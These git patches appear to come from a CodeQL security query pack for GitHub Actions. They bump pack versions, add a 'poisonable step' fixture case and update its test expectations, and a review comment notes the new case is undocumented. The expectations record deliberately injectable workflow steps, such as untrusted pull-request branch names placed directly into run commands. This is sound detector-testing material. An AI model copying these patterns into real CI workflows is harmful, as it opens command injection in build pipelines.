From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 5 Jul 2024 18:18:04 +0200 Subject: [PATCH 379/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 59ab88b42e41..dd99208f5e34 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.13 +version: 0.1.14 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f25fd70619fd..fe02dad9c55e 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.13 +version: 0.1.14 groups: [actions, queries] suites: codeql-suites extractor: javascript From bc483fc380e5303a8939f695d885ec6d50ddd1ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 6 Jul 2024 22:44:57 +0200 Subject: [PATCH 380/707] Add poisonable step test --- .../.github/workflows/poisonable_steps.yml | 3 +- .../library-tests/poisonable_steps.expected | 3 +- ql/test/library-tests/test.expected | 161 ++++++++++-------- 3 files changed, 90 insertions(+), 77 deletions(-) diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index 3e31507cef1e..608b3d5a09f8 100644 --- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -21,5 +21,4 @@ jobs: - run: python scripts/generate_theme.py --outfile js/storybook/theme.css - run: ruby scripts/generate_theme.rb --outfile js/storybook/theme.css - run: bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css - - + - run: xvfb-run ./mvnw clean package 
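Review bot: The new `- run: xvfb-run ./mvnw clean package` line gives no hint of what makes it a poisonable step, so the next person editing this fixture cannot tell which aspect the library test exercises; a trailing comment such as `# wrapper prefix in front of a repo-local executable` would pin it down. The `poisonable_steps.expected` hunk in the same commit records the step at `24:9:24:43`, so the case is already covered by the expectations; only the intent is undocumented. The enclosing `steps:` list starts outside the hunk.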
diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected
index 62ffff3c15c2..52f38506f09d 100644
--- a/ql/test/library-tests/poisonable_steps.expected
+++ b/ql/test/library-tests/poisonable_steps.expected
@@ -15,4 +15,5 @@
 | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step |
 | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step |
 | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step |
-| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step |
+| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step |
diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected
index efb0bca69528..19eda82df481 100644
--- a/ql/test/library-tests/test.expected
+++ b/ql/test/library-tests/test.expected
@@ -6,20 +6,20 @@ files
 workflows
 | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment |
 | .github/workflows/multiline.yml:1:1:89:29 | on: |
-| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push |
+| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push |
 | .github/workflows/test.yml:1:1:40:53 | on: push |
 reusableWorkflows
 compositeActions
 jobs
 | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber |
 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test |
-| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands |
+| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands |
 | .github/workflows/test.yml:5:5:31:2 | Job: job1 |
 | .github/workflows/test.yml:32:5:40:53 | Job: job2 |
 localJobs
 | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber |
 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test |
-| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands |
+| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands |
 | .github/workflows/test.yml:5:5:31:2 | Job: job1 |
 | .github/workflows/test.yml:32:5:40:53 | Job: job2 |
 extJobs
@@ -61,7 +61,8 @@ steps
 | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step |
 | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step |
 | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step |
-| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step |
+| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step |
 | .github/workflows/test.yml:11:9:15:6 | Uses Step |
 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source |
 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step |
@@ -106,7 +107,8 @@ runSteps
 | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py |
 | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css |
 | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css |
-| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css |
+| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css |
+| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | xvfb-run ./mvnw clean package |
 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} |
 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} |
 | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} |
@@ -184,7 +186,8 @@ runStepChildren
 | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py |
 | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css |
 | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css |
-| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css |
+| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css |
+| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package |
 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 |
 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} |
 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 |
@@ -337,82 +340,86 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| 
.github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | 
.github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| 
.github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | 
.github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | 
.github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| 
.github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby 
scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push |
+| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands |
+| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step |
 | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push |
 | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push |
 | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push |
@@ -569,11 +576,11 @@ cfgNodes
 | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n |
 | .github/workflows/multiline.yml:85:9:89:29 | Run Step |
 | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n |
-| .github/workflows/poisonable_steps.yml:1:1:23:93 | enter on: push |
